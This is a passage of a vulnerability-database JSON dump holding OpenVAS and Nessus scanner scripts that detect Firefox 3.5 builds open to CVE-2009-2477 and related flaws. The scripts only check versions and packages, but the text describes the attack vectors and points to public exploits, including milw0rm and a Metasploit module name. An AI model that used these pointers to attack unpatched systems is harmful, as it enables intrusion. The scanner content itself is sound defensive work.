script_tag(name:\"affected\", value:\"Firefox version 3.5.1 and prior on Linux\");\n script_tag(name:\"insight\", value:\"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 'flash bug.' which can cause application crash.\n\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\");\n script_tag(name:\"solution\", value:\"Upgrade to Firefox version 3.6.3 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/firefox/upgrade.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Linux/Ver\");\nif(!ffVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n report = report_fixed_ver(installed_version:ffVer, vulnerable_range:\"Less than or equal to 3.5.1\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-02T21:14:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-07-17T00:00:00", "id": "OPENVAS:800843", "href": "http://plugins.openvas.org/nasl.php?oid=800843", "type": "openvas", "title": "Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_firefox_js_compiler_code_exec_vuln_win.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# Upgrade to detect non vulnerable version\n# - By sharaths <sharaths@secpod.com> On 2009-07-17\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to execute arbitrary code which\n results in memory corruption.\n Impact Level: Application\";\ntag_affected = \"Firefox version 3.5 and prior on Windows\";\ntag_insight = \"The flaw is due to an error when processing JavaScript code handling\n 'font' HTML tags and can be exploited to cause memory corruption.\";\ntag_solution = \"Upgrade to Firefox version 3.5.1 or later\n http://www.mozilla.com/en-US/firefox/all.html\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.\";\n\nif(description)\n{\n script_id(800843);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-17 12:47:28 +0200 (Fri, 17 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2477\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/35798\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9137\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/1868\");\n script_xref(name : \"URL\" , value : \"http://www.mozilla.org/security/announce/2009/mfsa2009-41.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_require_keys(\"Firefox/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!ffVer){\n exit(0);\n}\n\n# Grep for Firefox version < 3.5.1\nif(version_is_less(version:ffVer, test_version:\"3.5.1\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064446", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064446", "type": "openvas", "title": "FreeBSD Ports: firefox35", "sourceData": "#\n#VID c1ef9b33-72a6-11de-82ea-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c1ef9b33-72a6-11de-82ea-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: firefox35\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/security/announce/2009/mfsa2009-41.html\nhttp://www.kb.cert.org/vuls/id/443060\nhttp://www.vuxml.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64446\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\");\n script_name(\"FreeBSD Ports: firefox35\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5.1,1\")<0) {\n txt += 'Package firefox35 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64446", "href": "http://plugins.openvas.org/nasl.php?oid=64446", "type": "openvas", "title": "FreeBSD Ports: firefox35", "sourceData": "#\n#VID c1ef9b33-72a6-11de-82ea-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c1ef9b33-72a6-11de-82ea-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: firefox35\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/security/announce/2009/mfsa2009-41.html\nhttp://www.kb.cert.org/vuls/id/443060\nhttp://www.vuxml.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64446);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\");\n script_name(\"FreeBSD Ports: firefox35\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5.1,1\")<0) {\n txt += 'Package firefox35 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-07-17T00:00:00", "id": "OPENVAS:1361412562310800844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800844", "type": "openvas", "title": "Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# Upgrade to detect non vulnerable version\n# - By sharaths <sharaths@secpod.com> On 2009-07-17\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800844\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-17 12:47:28 +0200 (Fri, 17 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2477\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/35798\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9137\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1868\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.org/security/announce/2009/mfsa2009-41.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_mandatory_keys(\"Firefox/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code which\n results in memory corruption.\");\n script_tag(name:\"affected\", value:\"Firefox version 3.5 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error when processing JavaScript code handling\n 'font' HTML tags and can be exploited to cause memory corruption.\");\n script_tag(name:\"solution\", value:\"Upgrade to Firefox version 3.5.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Linux/Ver\");\nif(!ffVer)\n exit(0);\n\nif(version_is_less(version:ffVer, test_version:\"3.5.1\")){\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"3.5.1\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:07:31", "description": "Update to new upstream Firefox version 3.5.1, fixing multiple security\nissues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-\nvulnerabilities/firefox35.html#firefox3.5.1 Update also includes all\npackages depending on gecko-libs rebuilt against new version of\nFirefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2009-07-23T00:00:00", "title": "Fedora 11 : kazehakase-0.5.6-11.svn3771_trunk.fc11.3 / Miro-2.0.5-2.fc11 / blam-1.8.5-12.fc11 / etc (2009-7898)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "modified": "2009-07-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:google-gadgets", "p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "p-cpe:/a:fedoraproject:fedora:epiphany", "p-cpe:/a:fedoraproject:fedora:chmsee", "p-cpe:/a:fedoraproject:fedora:ruby-gnome2", "p-cpe:/a:fedoraproject:fedora:evolution-rss", "p-cpe:/a:fedoraproject:fedora:java-1.6.0-openjdk", "p-cpe:/a:fedoraproject:fedora:kazehakase", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:epiphany-extensions", "p-cpe:/a:fedoraproject:fedora:blam", "p-cpe:/a:fedoraproject:fedora:hulahop", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:eclipse", "cpe:/o:fedoraproject:fedora:11", "p-cpe:/a:fedoraproject:fedora:Miro", "p-cpe:/a:fedoraproject:fedora:mozvoikko", "p-cpe:/a:fedoraproject:fedora:yelp"], "id": "FEDORA_2009-7898.NASL", "href": "https://www.tenable.com/plugins/nessus/40347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7898.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40347);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35660, 35707);\n script_xref(name:\"FEDORA\", value:\"2009-7898\");\n\n script_name(english:\"Fedora 11 : kazehakase-0.5.6-11.svn3771_trunk.fc11.3 / Miro-2.0.5-2.fc11 / blam-1.8.5-12.fc11 / etc (2009-7898)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.5.1, fixing multiple security\nissues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-\nvulnerabilities/firefox35.html#firefox3.5.1 Update also includes all\npackages depending on gecko-libs rebuilt against new version of\nFirefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/known-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511228\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026829.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c4dd5e68\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026830.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c39626ea\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?516373f1\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026832.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?35f8f173\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026833.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1c9cf6fc\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026834.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5868543c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026835.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3d7aa3f7\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026836.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6c17131d\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026837.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?39187779\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026838.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?54b8571c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026839.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d134e44\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026840.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5892c8e\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026841.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4125ee3f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026842.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7dbcd608\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026843.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eee125d3\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026844.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?099355bd\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026845.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aa7e1869\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026846.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?188401d2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026847.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f89eae2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026848.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5a3b49c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 3.5 escape() Return Value Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:Miro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:blam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chmsee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:eclipse\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:epiphany\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:epiphany-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:evolution-rss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:google-gadgets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:hulahop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kazehakase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby-gnome2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:yelp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"Miro-2.0.5-2.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"blam-1.8.5-12.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"chmsee-1.0.1-9.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"eclipse-3.4.2-13.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"epiphany-2.26.3-2.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"epiphany-extensions-2.26.1-4.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"evolution-rss-0.1.2-11.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"firefox-3.5.1-1.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"galeon-2.0.7-12.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"gnome-python2-extras-2.25.3-5.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"gnome-web-photo-0.7-4.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"google-gadgets-0.11.0-2.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"hulahop-0.4.9-6.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"java-1.6.0-openjdk-1.6.0.0-25.b16.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"kazehakase-0.5.6-11.svn3771_trunk.fc11.3\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"mozvoikko-0.9.7-0.5.rc1.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", 